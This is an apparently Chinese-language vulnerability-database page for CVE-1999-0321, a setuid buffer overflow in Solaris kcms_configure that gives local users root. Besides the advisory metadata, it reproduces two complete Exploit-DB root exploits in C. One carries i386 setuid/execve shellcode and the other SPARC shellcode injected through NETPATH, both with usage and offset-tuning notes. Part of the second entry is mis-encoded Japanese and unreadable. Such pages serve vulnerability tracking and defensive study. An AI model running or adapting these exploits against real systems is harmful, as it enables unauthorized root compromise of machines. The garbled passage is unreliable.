CVE-1999-0321
CVSS7.2
发布时间 :1998-12-01 00:00:00
修订时间 :2008-09-09 08:34:17
NMCOE    

[原文]Buffer overflow in Solaris kcms_configure command allows local users to gain root access.


[CNNVD]Solaris kcms_configure命令权限提升漏洞(CNNVD-199812-001)

        Solaris kcms_configure命令存在缓冲区溢出漏洞。本地用户可以获取根访问。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0321
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0321
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199812-001
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

Solaris kcms_configure命令权限提升漏洞
高危 缓冲区溢出
1998-12-01 00:00:00 2005-05-02 00:00:00
本地  
        Solaris kcms_configure命令存在缓冲区溢出漏洞。本地用户可以获取根访问。

- 公告与补丁

        

- 漏洞信息 (19341)

Solaris <= 2.5.1 kcms Buffer Overflow Vulnerability (1) (EDBID:19341)
solaris local
1998-12-24 Verified
0 Cheez Whiz
N/A [点击下载]
source: http://www.securityfocus.com/bid/452/info


There is an unchecked sprintf() call in the versions of /usr/openwin/bin/kcms_configure shipped with solaris 2.5, 2.5.1 and 2.6. Unfortunately, kcms_configure is installed setuid root, making it possible for an attacker to overflow the buffer and have arbitrary code executed with superuser privileges. The consequence of this vulnerability being exploited is a local root compromise.

/**
***  kcmsex - i386 Solaris root exploit for /usr/openwin/bin/kcms_configure
***
***  Tested and confirmed under Solaris 2.6 i386
***
***  Usage:  % kcmsex [offset]
***
***  where offset (if present) is the number of bytes to add to the stack
***  pointer to calculate your target return address; try -1000 to 1000 in
***  increments of 100 for starters.  Thanks go to Sun for cranking out
***  such sloppy privileged code.  Keep those holes a coming, boys!
***
***  Cheez Whiz
***  cheezbeast@hotmail.com
***
***  December 17, 1998
**/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFLEN 500
#define NOP 0x90

char shell[] =
/*  0 */ "\xeb\x3b"                         /* jmp springboard       */
/* syscall:                                                          */
/*  2 */ "\x9a\xff\xff\xff\xff\x07\xff"     /* lcall 0x7,0x0         */
/*  9 */ "\xc3"                             /* ret                   */
/* start:                                                            */
/* 10 */ "\x5e"                             /* popl %esi             */
/* 11 */ "\x31\xc0"                         /* xor %eax,%eax         */
/* 13 */ "\x89\x46\xc1"                     /* movl %eax,-0x3f(%esi) */
/* 16 */ "\x88\x46\xc6"                     /* movb %al,-0x3a(%esi)  */
/* 19 */ "\x88\x46\x07"                     /* movb %al,0x7(%esi)    */
/* 22 */ "\x89\x46\x0c"                     /* movl %eax,0xc(%esi)   */
/* setuid:                                                           */
/* 25 */ "\x31\xc0"                         /* xor %eax,%eax         */
/* 27 */ "\x50"                             /* pushl %eax            */
/* 28 */ "\xb0\x17"                         /* movb $0x17,%al        */
/* 30 */ "\xe8\xdf\xff\xff\xff"             /* call syscall          */
/* 35 */ "\x83\xc4\x04"                     /* addl $0x4,%esp        */
/* execve:                                                           */
/* 38 */ "\x31\xc0"                         /* xor %eax,%eax         */
/* 40 */ "\x50"                             /* pushl %eax            */
/* 41 */ "\x8d\x5e\x08"                     /* leal 0x8(%esi),%ebx   */
/* 44 */ "\x53"                             /* pushl %ebx            */
/* 45 */ "\x8d\x1e"                         /* leal (%esi),%ebx      */
/* 47 */ "\x89\x5e\x08"                     /* movl %ebx,0x8(%esi)   */
/* 50 */ "\x53"                             /* pushl %ebx            */
/* 51 */ "\xb0\x3b"                         /* movb $0x3b,%al        */
/* 53 */ "\xe8\xc8\xff\xff\xff"             /* call syscall          */
/* 58 */ "\x83\xc4\x0c"                     /* addl $0xc,%esp        */
/* springboard:                                                      */
/* 61 */ "\xe8\xc8\xff\xff\xff"             /* call start            */
/* data:                                                             */
/* 66 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA                  */
/* 74 */ "\xff\xff\xff\xff"                 /* DATA                  */
/* 78 */ "\xff\xff\xff\xff";                /* DATA                  */

char buf[BUFLEN];
unsigned long int nop, esp;
long int offset = 0;

unsigned long int
get_esp()
{
    __asm__("movl %esp,%eax");
}

void
main (int argc, char *argv[])
{
    int i;

    if (argc > 1)
        offset = strtol(argv[1], NULL, 0);

    if (argc > 2)
        nop = strtoul(argv[2], NULL, 0);
    else
        nop = 285;

    esp = get_esp();

    memset(buf, NOP, BUFLEN);
    memcpy(buf+nop, shell, strlen(shell));
    for (i = nop+strlen(shell); i < BUFLEN-4; i += 4)
        *((int *) &buf[i]) = esp+offset;

    printf("jumping to 0x%08x (0x%08x offset %d) [nop %d]\n",
           esp+offset, esp, offset, nop);
    execl("/usr/openwin/bin/kcms_configure", "kcms_configure", "-P", buf,
          "foofoo", NULL);

    printf("exec failed!\n");
    return;
}


		

- 漏洞信息 (19342)

Solaris <= 2.5.1 kcms Buffer Overflow Vulnerability (2) (EDBID:19342)
solaris local
1998-12-24 Verified
0 UNYUN
N/A [点击下载]
source: http://www.securityfocus.com/bid/452/info
 
 
There is an unchecked sprintf() call in the versions of /usr/openwin/bin/kcms_configure shipped with solaris 2.5, 2.5.1 and 2.6. Unfortunately, kcms_configure is installed setuid root, making it possible for an attacker to overflow the buffer and have arbitrary code executed with superuser privileges. The consequence of this vulnerability being exploited is a local root compromise.

UNYUN@ShadowPenguinSecurity$B$G$9(B

$B<+8J%l%9$G$9!#(B

> $B$J$*!"(BSolaris7 Sparc Edition$B$K$bF1MM$NLdBj$,$"$j$^$9$,!"(B
> Solaris2.6(Sparc)$B$G$O:F8=$7$^$;$s$G$7$?!#(B

Solaris 2.6 (Sparc)$B$G$b:F8=$9$k$h$&$G$9!#(B
Solaris 2.6 (Sparc)$B$O%3%s%=!<%k%m%0%$%s$7$?>uBV$G%A%'%C%/$7$?$N$G$9$,!"%3(B
$B%s%=!<%k%m%0%$%s$@$H$3$NLdBj$O(BSolaris7$B$G$b:F8=$7$J$$$h$&$G$9!#%M%C%H%o!<(B
$B%/7PM3$G$N$_:F8=$9$k$h$&$G!"B>$N%^%7%s$+$i$N(Btelnet$B$K$F(BSolaris2.6 (Sparc)
$B$G$b:F8=$9$k$3$H$,3NG'$5$l$^$7$?!#$*$=$i$/!"(Bintel$BHG(BSolaris2.6$B$bF1MM$@$H;W(B
$B$o$l$^$9!#(B

case 1: exploit$B2DG=(B

hoge : $B%3%s%=!<%k%m%0%$%s(B

hoge# xhost +vul
hoge# telnet vul
Login:
Password:
vul% setenv DISPLAY hoge:0.0
vul% gcc ex_kcms_configuresp.c
vul% ./a.out
#

case 2: exploit$BIT2DG=(B

hoge : $B%3%s%=!<%k%m%0%$%s(B

hoge% gcc ex_kcms_configuresp.c
hoge% ./a.out
The specified profile could not be opened
getlasterrorhoge%
hoge%

Sparc$B$N>l9g!"%*%U%;%C%H(B2092-2093,2112-2115$B$r(Bfake$B$9$k$3$H$K$h$j!"%*%U%;%C(B
$B%H(B2116-2119$B$N(BRET$B$,M-8z$H$J$k$h$&$G!"(Bintel$BHGF1MM$K%m!<%+%k%f!<%6!<$,(Broot$B8"(B
$B8B$rC%<h$G$-$k$3$H$,3NG'$5$l$^$7$?!#$J$*!"%3!<%I@)8B$O(BIntel$BHG$h$j2?8N$+4E(B
$B$/$J$C$F$$$k$h$&$G$9!&!&!&(B

---- ex_kcms_configuresp.c
/*=============================================================================
   kcms_configure Exploit for Solaris2.6/7 Sparc Edition
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  =============================================================================
*/

#define ENV         "NETPATH="
#define MAXBUF      3000
#define RETADR      2116
#define RETOFS      0x1300
#define EXPADR      1200
#define FAKEADR1    2092
#define FAKEADR2    2112
#define NOP         0xa61cc013

char exploit_code[] =
"\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}

main()
{
    char            buf[MAXBUF];
    unsigned int    i,ip,sp;

    putenv("LANG=");
    sp=get_sp();
    printf("ESP =0x%x\n",sp);

    for (i=0;i<MAXBUF-4;i+=4){
        buf[i+3]=NOP&0xff;
        buf[i+2]=(NOP>>8)&0xff;
        buf[i+1]=(NOP>>16)&0xff;
        buf[i  ]=(NOP>>24)&0xff;
    }

    ip=sp;
    printf("FAKE=0x%x\n",sp);
    buf[FAKEADR1+3]=ip&0xff;
    buf[FAKEADR1+2]=(ip>>8)&0xff;
    buf[FAKEADR1+1]=(ip>>16)&0xff;
    buf[FAKEADR1  ]=(ip>>24)&0xff;
    buf[FAKEADR2+3]=ip&0xff;
    buf[FAKEADR2+2]=(ip>>8)&0xff;
    buf[FAKEADR2+1]=(ip>>16)&0xff;
    buf[FAKEADR2  ]=(ip>>24)&0xff;

    ip=sp-RETOFS;
    printf("EIP =0x%x\n",sp);
    buf[RETADR+3]=ip&0xff;
    buf[RETADR+2]=(ip>>8)&0xff;
    buf[RETADR+1]=(ip>>16)&0xff;
    buf[RETADR]=(ip>>24)&0xff;

    strncpy(buf+EXPADR,exploit_code,strlen(exploit_code));

    strncpy(buf,ENV,strlen(ENV));
    buf[MAXBUF-1]=0;
    putenv(buf);

    execl("/usr/openwin/bin/kcms_configure","kcms_configure","1",0);
}
		

- 漏洞信息

7526
Solaris kcms_configure Local Command Overflow
Local Access Required Input Manipulation
Loss of Integrity Workaround
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

1998-12-24 Unknow
1998-12-24 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站